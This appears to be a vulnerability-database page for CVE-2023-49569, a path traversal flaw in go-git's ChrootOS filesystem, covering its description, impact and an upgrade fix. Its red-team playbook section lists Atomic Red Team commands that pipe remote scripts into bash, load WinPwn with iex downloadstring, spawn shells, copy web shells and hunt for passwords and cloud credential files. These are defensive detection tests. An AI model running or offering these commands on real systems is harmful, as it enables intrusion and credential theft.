CVE-2023-49569
Overview
This vulnerability is a path traversal flaw rooted in improper sanitization of file paths within the go-git library's ChrootOS filesystem implementation. The affected component fails to restrict file operations to the intended directory boundaries, allowing crafted paths to escape the chroot environment. This issue specifically impacts the ChrootOS abstraction used by default in Plain versions of Open and Clone functions in go-git prior to v5.11.
Vulnerability Description
A path traversal vulnerability was discovered in go-git versions prior to v5.11. This vulnerability allows an attacker to create and amend files across the filesystem. In the worse case scenario, remote code execution could be achieved. Applications are only affected if they are using the ChrootOS https://pkg.go.dev/github.com/go-git/go-billy/v5/osfs#ChrootOS , which is the default when using "Plain" versions of Open and Clone funcs (e.g. PlainClone). Applications using BoundOS https://pkg.go.dev/github.com/go-git/go-billy/v5/osfs#BoundOS or in-memory filesystems are not affected by this issue. This is a go-git implementation issue and does not affect the upstream git cli.
Impact
An unauthenticated remote attacker can exploit this vulnerability to write or modify files anywhere on the filesystem accessible to the application process. This unrestricted file manipulation can lead to remote code execution, enabling full system compromise. Since the vulnerability requires only network access and no user interaction, it presents a critical risk to applications using vulnerable go-git versions with ChrootOS. The CVSS vector confirms high confidentiality, integrity, and availability impacts without privileges or user interaction.
Solution
Upgrade go-git to version 5.11 or later, where the path traversal flaw in ChrootOS is addressed. Refer to the official GitHub security advisory GHSA-449p-3h89-pw88 for detailed patch information and remediation steps. Applications using BoundOS or in-memory filesystems are not affected, but those relying on PlainClone or PlainOpen functions should apply the update promptly to mitigate this vulnerability.
EPSS vs KEV Prediction — Evolution (30 days)
Full Analysis
A critical path traversal vulnerability has been identified in specific versions of the go-git library, particularly those prior to v5.11. This flaw arises from improper validation of user-supplied input, allowing an attacker to manipulate file paths. By exploiting this weakness, an attacker can traverse the filesystem, potentially creating or modifying files outside of the intended directories. In the most severe scenarios, this vulnerability could lead to remote code execution, enabling an attacker to execute arbitrary code on the host system. The risk is heightened in environments where the ChrootOS filesystem is utilized, as it is the default setting for certain functions like PlainClone.
The attack vectors for this vulnerability are primarily centered around applications that utilize the go-git library with the ChrootOS configuration. An attacker could craft a malicious request that leverages the path traversal flaw to access sensitive files or execute commands on the server. For instance, by manipulating the input to the Open or Clone functions, an attacker could potentially overwrite critical system files or introduce malicious scripts. This exploitation could occur in various scenarios, such as when a web application allows users to upload or clone repositories without adequate sanitization of the input, thereby exposing the application to significant risk.
The real-world impact of this vulnerability can be substantial, particularly for organizations that rely on the go-git library for version control and repository management. If successfully exploited, the consequences could range from data breaches to complete system compromise. The business risks associated with such an incident include financial losses, reputational damage, and regulatory penalties, especially if sensitive data is exposed or if the organization fails to comply with data protection regulations. The potential for remote code execution amplifies the severity of the threat, as attackers could leverage this capability to deploy ransomware or other malicious payloads, further exacerbating the impact on the organization.
To detect and mitigate this vulnerability, organizations should first assess their usage of the go-git library and determine if they are utilizing versions prior to v5.11. Implementing version control and ensuring that all libraries are kept up to date is crucial in minimizing exposure to known vulnerabilities. Additionally, organizations should employ input validation and sanitization techniques to prevent path traversal attacks. This includes restricting file access to only necessary directories and implementing strict checks on user inputs. Monitoring and logging access to critical files can also help in detecting any suspicious activities that may indicate an attempted exploitation of this vulnerability.
In conclusion, the path traversal vulnerability in the go-git library poses a significant threat to applications that utilize the ChrootOS filesystem. The potential for remote code execution highlights the urgency for organizations to address this issue proactively. By adopting robust security practices, including regular updates, input validation, and vigilant monitoring, organizations can mitigate the risks associated with this vulnerability and protect their systems from potential exploitation.
Affected Products (1)
| Vendor | Product | Version | CPE | |
|---|---|---|---|---|
|
|
Go-Git Project | Go-Git | All |
cpe:2.3:a:go-git_project:go-git:*:*:*:*:*:go:*:*
|
Exploits
No exploits found for this CVE.
Threat Feed
0 eventsNo threat activity recorded for this CVE.
Likely Kill Chain
Typical exploitation path inferred from this vulnerability's characteristics — mapped to MITRE ATT&CK tactics.
Kill chain derived from the ML classifier.
Attack Vectors ML
MITRE ATT&CK Techniques (6)
The adversary's likely kill chain after exploiting this CVE — in execution order. Validate each stage with the Red Team Playbook below.
The techniques for this CVE don't apply to this operating system. Switch OS above.
CAPEC Attack Patterns ML
Red Team Playbook
44 AtomicRedTeam test(s) mapped to this CVE's kill chain. Use them to validate detections and controls.
AtomicRedTeam has no published tests for this CVE's techniques on this OS. Switch OS above to see other options.
Set-PowerCLIConfiguration -InvalidCertificateAction Ignore -ParticipateInCEIP:$false -Confirm:$false
Connect-VIServer -Server #{vm_host} -User #{vm_user} -Password #{vm_pass}
Get-VMHostService -VMHost #{vm_host} | Where-Object {$_.Key -eq "TSM-SSH" } | Start-VMHostService -Confirm:$false
echo "" | "#{plink_file}" -batch "#{vm_host}" -ssh -l #{vm_user} -pw "#{vm_pass}" "vim-cmd hostsvc/enable_ssh"
$syntaxList = #{syntax}
foreach ($syntax in $syntaxList) {
#{SharpView} $syntax -}
netstat -ano
net use
net sessions 2>nul
netstat
who -a
Get-NetTCPConnection | ForEach-Object {
$p = Get-Process -Id $_.OwningProcess -ErrorAction SilentlyContinue
[pscustomobject]@{
Local = "$($_.LocalAddress):$($_.LocalPort)"
Remote = "$($_.RemoteAddress):$($_.RemotePort)"
State = $_.State
PID = $_.OwningProcess
Process = if ($p) { $p.ProcessName } else { $null }
}
} | Sort-Object State,Process | Format-Table -AutoSize
sockstat -4
sockstat -6 2>/dev/null || true
sockstat -l 2>/dev/null || true
if command -v ss >/dev/null 2>&1; then ss -antp 2>/dev/null || ss -ant; ss -aunp 2>/dev/null || true; else lsof -i -nP 2>/dev/null || true; fi
Get-NetTCPConnection
[ "$(uname)" = 'FreeBSD' ] && pw useradd art -g wheel -s /bin/csh || useradd -s /bin/bash art
cat /etc/passwd |grep ^art
chsh -s /bin/sh art
cat /etc/passwd |grep ^art
for i in $(seq 1 5); do echo "$i, Atomic Red Team was here!"; sleep 1; done
curl -sS https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
wget --quiet -O - https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
sh -c "echo 'echo Hello from the Atomic Red Team' > #{script_path}"
sh -c "echo 'ping -c 4 #{host}' >> #{script_path}"
chmod +x #{script_path}
sh #{script_path}
echo '! exec "/bin/sh &"' | PERL_MM_USE_DEFAULT=1 cpan
uname -srm
cd /tmp
curl -s #{remote_url} |bash
ls -la /tmp/art.txt
export ART='echo "Atomic Red Team was here... T1059.004"'
echo $ART |/bin/sh
chmod +x #{autosuid}
bash #{autosuid}
chmod +x #{linenum}
bash #{linenum}
TMPFILE=$(mktemp)
echo "id" > $TMPFILE
bash $TMPFILE
[ "$(uname)" = 'FreeBSD' ] && encodecmd="b64encode -r -" && decodecmd="b64decode -r" || encodecmd="base64 -w 0" && decodecmd="base64 -d"
ART=$(echo -n "id" | $encodecmd)
echo "\$ART=$ART"
echo -n "$ART" | $decodecmd |/bin/bash
unset ART
awk 'BEGIN {system("/bin/sh &")}'
busybox sh &
echo $0
if $(env |grep "SHELL" >/dev/null); then env |grep "SHELL"; fi
if $(printenv SHELL >/dev/null); then printenv SHELL; fi
cat /etc/shells
sudo emacs -Q -nw --eval '(term "/bin/sh &")'
xcopy /I /Y "#{web_shells}" #{web_shell_path}
type C:\Windows\Panther\unattend.xml
type C:\Windows\Panther\Unattend\unattend.xml
python2 laZagne.py all
grep -ri password #{file_path}
exit 0
findstr /si pass *.xml *.doc *.txt *.xls
ls -R | select-string -ErrorAction SilentlyContinue -Pattern password
find #{file_path}/.aws -name "credentials" -type f 2>/dev/null
find #{file_path}/.azure -name "msal_token_cache.json" -o -name "accessTokens.json" -type f 2>/dev/null
find #{file_path}/.config/gcloud -name "credentials.db" -o -name "access_tokens.db" -type f 2>/dev/null
find #{file_path}/.oci/sessions -name "token" -type f 2>/dev/null
for file in $(find #{file_path} -type f -name .netrc 2> /dev/null);do echo $file ; cat $file ; done
dir /a:h C:\Users\%USERNAME%\AppData\Local\Microsoft\Credentials\
dir /a:h C:\Users\%USERNAME%\AppData\Roaming\Microsoft\Credentials\
$usernameinfo = (Get-ChildItem Env:USERNAME).Value
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Roaming\Microsoft\Credentials\
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Local\Microsoft\Credentials\
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
SharpCloud -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sessionGopher -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
Snaffler -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
passhunt -local $true -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
powershellsensitive -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sensitivefiles -noninteractive -consoleoutput
Detection & Response Rules
No detection or response rules found for this CVE.
No news articles found for this CVE.
References (2)
| Title | Tags | URL |
|---|---|---|
| nvd.nist.gov |
NVD
reference
|
https://nvd.nist.gov/vuln/detail/CVE-2023-49569 |
| github.com |
GitHub CVE
|
https://github.com/go-git/go-git/security/advisories/GHSA-449p-3h89-pw88 |